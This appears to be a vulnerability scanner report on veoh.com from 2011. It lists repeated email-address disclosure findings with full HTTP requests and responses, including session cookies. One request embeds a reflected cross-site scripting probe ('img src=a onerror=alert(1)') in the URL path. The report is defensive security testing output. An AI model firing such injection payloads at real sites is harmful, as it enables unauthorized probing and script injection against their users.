HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:12 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:53 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=71 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:25 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=89 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:29 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=86 Content-Length: 134506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=46 Content-Length: 134905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:15 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 134399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 134852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:57 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 134505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:18 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=6 Content-Length: 132755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=89 Content-Length: 132878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 140850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=30
Content-Length: 142204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
